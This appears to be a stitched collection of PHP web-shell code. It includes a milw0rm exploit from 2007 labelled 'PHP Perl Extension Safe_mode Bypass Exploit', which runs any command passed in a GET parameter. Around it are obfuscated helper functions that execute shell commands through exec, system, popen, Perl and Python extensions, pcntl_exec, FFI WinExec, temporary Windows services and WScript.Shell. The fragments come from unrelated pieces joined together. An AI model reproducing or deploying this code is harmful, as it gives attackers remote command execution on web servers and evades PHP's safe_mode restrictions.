function perlshelL($command)
{
$perl = new perl();
ob_start();
$perl->eval("system(\"{$command}\")");
$exec = ob_get_contents();
ob_end_clean();
return $exec;
}
function ex($cmd)
{
global $result;
if (!empty($cmd)) {
if (SAFEMODE) {
if (extension_loaded("python")) {
$result = python_eval("import os\nos.system('{$cmd}')");
if (empty($result)) {
$result = python_eval('import os\\npwd = os.getcwd()\\nprint pwd\\nos.system("$cmd")');
}
return $result;
} elseif (extension_loaded("perl")) {
$perl = new perl();
$perl->eval("system('{$cmd}')");
$result = $perl;
return $result;
}
} else {
if (funcex("exec")) {
@exec($cmd, $result);
$result = join("\n", $result);
} elseif (funcex("shell_exec")) {
$result = @shell_exec($cmd);
} elseif (funcex("system")) {
@ob_start();
@system($cmd);
$result = @ob_get_contents();
@ob_end_clean();
} elseif (funcex("passthru")) {
@ob_start();
@passthru($cmd);
$result = @ob_get_contents();
@ob_end_clean();
} elseif (@is_resource($f = @popen($cmd, "r"))) {
while (!@feof($f)) {
$result .= @fread($f, 8192);
}
@pclose($f);
}
}
}
return $result;
}
<?php
##########################################################
###----------------------------------------------------###
###----PHP Perl Extension Safe_mode Bypass Exploit-----###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################
if (!extension_loaded('perl')) {
die('perl extension is not loaded');
}
if (!isset($_GET)) {
$_GET =& $HTTP_GET_VARS;
}
if (empty($_GET['cmd'])) {
$_GET['cmd'] = strtoupper(substr(PHP_OS, 0, 3)) == 'WIN' ? 'dir' : 'ls';
}
$perl = new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('" . $_GET['cmd'] . "')");
echo "</textarea>";
$_GET['cmd'] = htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='" . $_GET['cmd'] . "' size=25></form>";
?>
# milw0rm.com [2007-08-25]
function z6v($c)
{
global $win, $tempdir;
$r = '';
if (!empty($c)) {
if (!$win) {
if (extension_loaded('perl')) {
@ob_start();
$p = new perl();
$p->eval("system('{$c}')");
$r = @ob_get_contents();
@ob_end_clean();
} elseif (z7r('pcntl_exec') && z7r('pcntl_fork')) {
$r = '[~] Blind Command Execution via [pcntl_exec]\\n\\n';
$o = $tempdir . uniqid('pcntl');
$pid = @pcntl_fork();
if ($pid == -1) {
$r .= '[-] Could not fork. Exit';
} elseif ($pid) {
$r .= @pcntl_wifexited($status) ? '[+] Done! Command "' . $c . '" successfully executed.' : '[-] Error. Incorrect Command.';
} else {
$c = array(" -e 'system(\"{$c} > {$o}\")'");
if (@pcntl_exec('/usr/bin/perl', $c)) {
exit(0);
}
if (@pcntl_exec('/usr/local/bin/perl', $c)) {
exit(0);
}
die;
}
$r = z9p($o);
@unlink($o);
}
} else {
$o = $tempdir . uniqid('NJ');
if (extension_loaded('ffi')) {
$a = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$r = $a->WinExec("cmd.exe /c " . z6l($c) . " >\"{$o}\"", 0);
while (!@file_exists($o)) {
sleep(1);
}
$r = z9p($o);
} elseif (extension_loaded('win32service')) {
$s = uniqid('NJ');
@win32_create_service(array('service' => $s, 'display' => $s, 'path' => 'c:\\windows\\system32\\cmd.exe', 'params' => "/c " . z6l($c) . " >\"{$o}\""));
@win32_start_service($s);
@win32_stop_service($s);
@win32_delete_service($s);
while (!@file_exists($o)) {
sleep(1);
}
$r = z9p($o);
} elseif (extension_loaded("win32std")) {
@win_shell_execute('..\\..\\..\\..\\..\\..\\..\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
while (!@file_exists($o)) {
sleep(1);
}
$r = z9p($o);
} else {
$a = new COM("WScript.Shell");
$a->Run('c:\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
$r = z9p($o);
}
@unlink($o);
}
}
return $r;
}
